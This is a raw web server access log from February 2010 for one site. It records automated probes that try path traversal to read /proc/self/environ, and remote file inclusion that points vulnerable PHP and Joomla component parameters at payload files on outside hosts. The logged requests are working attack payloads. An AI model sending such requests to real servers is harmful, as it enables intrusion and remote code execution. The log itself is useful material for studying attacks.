174.133.29.194 - - [21/Feb/2010:05:48:38 -0800] "GET /error.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [21/Feb/2010:05:48:38 -0800] "GET /logs/access_100116.log/error.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [21/Feb/2010:05:48:38 -0800] "GET /error.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [21/Feb/2010:05:48:38 -0800] "GET /logs/access_100116.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [21/Feb/2010:05:48:43 -0800] "GET /errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:49:07 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:49:11 -0800] "GET /logs////delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:49:11 -0800] "GET /logs/access_100121.log%20%20////delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:49:11 -0800] "GET ///delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:49:32 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:49:40 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:50:13 -0800] "GET /errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:50:13 -0800] "GET /logs/access_100214.log/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:50:13 -0800] "GET /logs/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:50:15 -0800] "GET /logs/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:50:15 -0800] "GET /logs/access_100210.log%20%20/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:50:15 -0800] "GET /errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:50:17 -0800] "GET /logs/access_100210.log/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:50:25 -0800] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:50:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:50:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:50:39 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.145.31.233 - - [21/Feb/2010:05:51:44 -0800] "GET /logs/access_100114.log/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.145.31.233 - - [21/Feb/2010:05:51:44 -0800] "GET /logs/access_100206.log/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.145.31.233 - - [21/Feb/2010:05:51:44 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.145.31.233 - - [21/Feb/2010:05:51:44 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:51:47 -0800] "GET /logs/access_100122.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:51:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:51:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
218.145.31.233 - - [21/Feb/2010:05:51:59 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.145.31.233 - - [21/Feb/2010:05:51:59 -0800] "GET /logs/access_100206.log/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.145.31.233 - - [21/Feb/2010:05:51:59 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.145.31.233 - - [21/Feb/2010:05:51:59 -0800] "GET /logs/access_100114.log/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:52:08 -0800] "GET /logs/access_100205.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:05:52:19 -0800] "GET //delete_all.php?board_skin_path=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:05:52:19 -0800] "GET /logs/access_100203.log%20%20///delete_all.php?board_skin_path=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:05:52:19 -0800] "GET /logs///delete_all.php?board_skin_path=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:05:53:21 -0800] "GET /logs/access_100121.log%20%20///delete_all.php?board_skin_path=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:05:53:26 -0800] "GET /logs/access_100130.log%20%20///delete_all.php?board_skin_path=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:05:53:45 -0800] "GET /includes/mambo.php/mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:05:53:45 -0800] "GET /logs/access_100119.log//includes/mambo.php/mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:05:53:45 -0800] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:54:06 -0800] "GET /logs/access_100205.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:54:20 -0800] "GET /errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:54:21 -0800] "GET /logs//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:54:21 -0800] "GET /logs/access_100105.log//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:54:54 -0800] "GET /logs/access_100214.log//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:05:54:55 -0800] "GET /logs/access_100204.log//includes/mambo.php/mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:54:58 -0800] "GET /errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:54:58 -0800] "GET /logs/access_100114.log%20%20//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:54:58 -0800] "GET /logs//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:05:54:58 -0800] "GET /logs/access_100210.log%20%20//errors.php?error=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:55:54 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:55:54 -0800] "GET /logs/access_100210.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:55:54 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:55:56 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:55:56 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:55:56 -0800] "GET /logs/access_100210.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:57:20 -0800] "GET /logs/access_100124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:57:30 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:58:09 -0800] "GET /logs/access_100129.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:05:58:30 -0800] "GET /logs/access_100203.log///delete_all.php?board_skin_path=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [21/Feb/2010:05:58:35 -0800] "GET /logs/access_100121.log///delete_all.php?board_skin_path=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:59:34 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:59:34 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:59:34 -0800] "GET /logs/access_100210.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:59:49 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:59:50 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [21/Feb/2010:05:59:50 -0800] "GET /logs/access_100210.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:06:33 -0800] "GET /http://www.import-et-export.fr//components/com_virtuemart/rs.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:07:06 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:07:06 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:07:06 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:07:13 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:08:14 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.rwies1406.de//sb/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:08:25 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:08:25 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:08:25 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:08:40 -0800] "GET /logs/access_100119.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:08:50 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:08:55 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:09:10 -0800] "GET /logs/access_100203.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:09:49 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:09:49 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:09:50 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:09:52 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:09:52 -0800] "GET /logs/access_100123.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:09:52 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:10:33 -0800] "GET /logs/access_100119.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:10:43 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:10:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:10:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:10:59 -0800] "GET /logs/access_100121.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:11:09 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:12:45 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:12:45 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:12:45 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:12:46 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:12:46 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:12:47 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:14:02 -0800] "GET /logs/access_100202.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:14:17 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:14:17 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:14:17 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:06:14:21 -0800] "GET /logs/access_100202.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:17:58 -0800] "GET /logs/access_100122.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
